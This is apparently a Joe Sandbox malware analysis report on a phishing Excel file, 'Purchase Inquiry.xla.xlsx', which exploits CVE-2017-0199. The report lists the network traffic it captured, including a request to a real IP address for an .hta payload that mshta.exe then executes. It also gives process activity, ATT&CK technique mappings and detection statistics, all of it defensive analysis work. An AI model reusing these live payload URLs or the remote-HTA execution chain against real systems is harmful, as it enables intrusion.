Source: global trafficHTTP traffic detected: GET /qhFdyeUknz?&love=waggish&nephew HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: link.saja.marketConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/emino/emi/seenbestthingsentiretimetogivemebest.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.23.187.151
Source: global trafficDNS traffic detected: DNS query: link.saja.market
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: Purchase Inquiry.xla.xlsxString found in binary or memory: https://link.saja.market/qhFdyeUknz?&love=waggish&nephewl
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 3.39.153.44:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: Purchase Inquiry.xla.xlsxOLE indicator, VBA macros: true
Source: Purchase Inquiry.xla.xlsxStream path 'MBD004F96D3/\x1Ole' : https://link.saja.market/qhFdyeUknz?&love=waggish&nephewlD]jD&} Qn:LRvCJ2[JPmwtLP;p~wF+7!1{g_C_Cj,{ &O|\f.%2dB}IVBrhyVFiCc4rOtcKzi3Gym2YyTefIkxBXxrM8r0MQI7okd3gou14RVkxHgxTlt92dlEcZ7PncagPJUKuR91qIkWPbKyXX5SOHDw158YD0nuw25PJ0cd8zzSF4Xzvl1AEBj76t3HTkr85IMwfTyUfR61Zi9EX2mF4aaubVK0onaiBzL2DgwZzvGazapDUOZ64xfu5wms$EVRTXFn
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'purchase inquiry.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal56.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Purchase Inquiry.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{6D4C4CDE-4B6B-4B1C-A106-7E9488F71EA3} - OProcSessId.datJump to behavior
Source: Purchase Inquiry.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Purchase Inquiry.xla.xlsxVirustotal: Detection: 24%
Source: Purchase Inquiry.xla.xlsxReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Purchase Inquiry.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Purchase Inquiry.xla.xlsxStatic file information: File size 1199616 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Purchase Inquiry.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Purchase Inquiry.xla.xlsxStream path 'MBD004F96D2/Package' entropy: 7.99226242676 (max. 8.0)
Source: Purchase Inquiry.xla.xlsxStream path 'Workbook' entropy: 7.99838662414 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 817Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Purchase Inquiry.xla.xlsx25%VirustotalBrowse
Purchase Inquiry.xla.xlsx21%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://link.saja.market/qhFdyeUknz?&love=waggish&nephew0%Avira URL Cloudsafe
https://link.saja.market/qhFdyeUknz?&love=waggish&nephewl0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0044.t-0009.fb-t-msedge.net
13.107.253.72
truefalse
    high
    s-0005.dual-s-dc-msedge.net
    52.123.131.14
    truefalse
      high
      service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com
      3.39.153.44
      truefalse
        unknown
        otelrules.svc.static.microsoft
        unknown
        unknownfalse
          high
          link.saja.market
          unknown
          unknownfalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
              high
              https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                high
                https://link.saja.market/qhFdyeUknz?&love=waggish&nephewfalse
                • Avira URL Cloud: safe
                unknown
                https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://link.saja.market/qhFdyeUknz?&love=waggish&nephewlPurchase Inquiry.xla.xlsxfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  198.23.187.151
                  unknownUnited States
                  36352AS-COLOCROSSINGUSfalse
                  13.107.253.72
                  s-part-0044.t-0009.fb-t-msedge.netUnited States
                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  3.39.153.44
                  service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.comUnited States
                  8987AMAZONEXPANSIONGBfalse
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1633348
                  Start date and time:2025-03-10 09:11:17 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 27s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Purchase Inquiry.xla.xlsx
                  Detection:MAL
                  Classification:mal56.expl.winXLSX@6/4@2/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, MavInject32.exe
                  • Excluded IPs from analysis (whitelisted): 52.109.89.18, 23.60.203.209, 52.109.89.19, 20.189.173.25, 52.109.28.46, 20.42.65.93, 52.149.20.212, 52.123.131.14, 20.190.160.131, 2.23.227.208, 2.23.227.202
                  • Excluded domains from analysis (whitelisted): onedscolprdeus20.eastus.cloudapp.azure.com, slscr.update.microsoft.com, weu-azsc-000.roaming.officeapps.live.com, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, config.officeapps.live.com, e16604.f.akamaiedge.net, onedscolprdwus20.westus.cloudapp.azure.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanag
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  04:13:32API Interceptor843x Sleep call for process: splwow64.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  13.107.253.72https://go.irt.calyx.ai/LiveGet hashmaliciousUnknownBrowse
                    Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                      Confirmation number 0001592289.xlsGet hashmaliciousUnknownBrowse
                        phish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousHTMLPhisherBrowse
                          SecuriteInfo.com.Win64.Malware-gen.1550.5420.exeGet hashmaliciousUnknownBrowse
                            MITRE Enterprise ATTACK v16.1.xlsxGet hashmaliciousMimikatzBrowse
                              05 BOIRON F 240700457 ORDEN 05 MAR 2025.xlsGet hashmaliciousUnknownBrowse
                                RFQ-JC25-#595837.xlsxGet hashmaliciousUnknownBrowse
                                  edinburghchamberPay-Advice#03042025.xlsbGet hashmaliciousUnknownBrowse
                                    https://portal.facilityos.com/Get hashmaliciousUnknownBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      s-0005.dual-s-dc-msedge.netFW+RemittanceE-staments.E-Code-pjRaXYOnxvXfztC+ApprovalCode-917008541420381.emlGet hashmaliciousunknownBrowse
                                      • 52.123.131.14
                                      VOIR LE DOCUMENT COMPLET.emlGet hashmaliciousHTMLPhisherBrowse
                                      • 52.123.131.14
                                      MITRE Enterprise ATTACK v16.1.xlsxGet hashmaliciousMimikatzBrowse
                                      • 52.123.130.14
                                      Message.emlGet hashmaliciousUnknownBrowse
                                      • 52.123.130.14
                                      Message.emlGet hashmaliciousUnknownBrowse
                                      • 52.123.130.14
                                      _EXT_ _EXT_ Hydraulic pump.msgGet hashmaliciousUnknownBrowse
                                      • 52.123.131.14
                                      05 BOIRON F 240700457 ORDEN 05 MAR 2025.xlsGet hashmaliciousHidden Macro 4.0Browse
                                      • 52.123.131.14
                                      Quote 09052022-008_1.xlsxGet hashmaliciousUnknownBrowse
                                      • 52.123.131.14
                                      Quote 09052022-008_1.xlsxGet hashmaliciousUnknownBrowse
                                      • 52.123.130.14
                                      file.0xd10e5bd05bb0.0xd10e58feb750.DataSectionObject.CV.docm.docmGet hashmaliciousUnknownBrowse
                                      • 52.123.131.14
                                      s-part-0044.t-0009.fb-t-msedge.nethttps://go.irt.calyx.ai/LiveGet hashmaliciousUnknownBrowse
                                      • 13.107.253.72
                                      Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • 13.107.253.72
                                      Confirmation number 0001592289.xlsGet hashmaliciousUnknownBrowse
                                      • 13.107.253.72
                                      ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                      • 13.107.253.72
                                      phish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousHTMLPhisherBrowse
                                      • 13.107.253.72
                                      https://assets-fra.mkt.dynamics.com/a4eec278-88f9-ef11-b013-6045bd6e9afa/digitalassets/standaloneforms/c345aa34-aff9-ef11-bae1-000d3a8999aeGet hashmaliciousUnknownBrowse
                                      • 13.107.253.72
                                      SecuriteInfo.com.Win64.Malware-gen.1550.5420.exeGet hashmaliciousUnknownBrowse
                                      • 13.107.253.72
                                      Bank Details.DocxGet hashmaliciousMicrosoft PhishingBrowse
                                      • 13.107.253.72
                                      MITRE Enterprise ATTACK v16.1.xlsxGet hashmaliciousMimikatzBrowse
                                      • 13.107.253.72
                                      05 BOIRON F 240700457 ORDEN 05 MAR 2025.xlsGet hashmaliciousUnknownBrowse
                                      • 13.107.253.72
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      AS-COLOCROSSINGUSapep.x86.elfGet hashmaliciousUnknownBrowse
                                      • 104.168.61.9
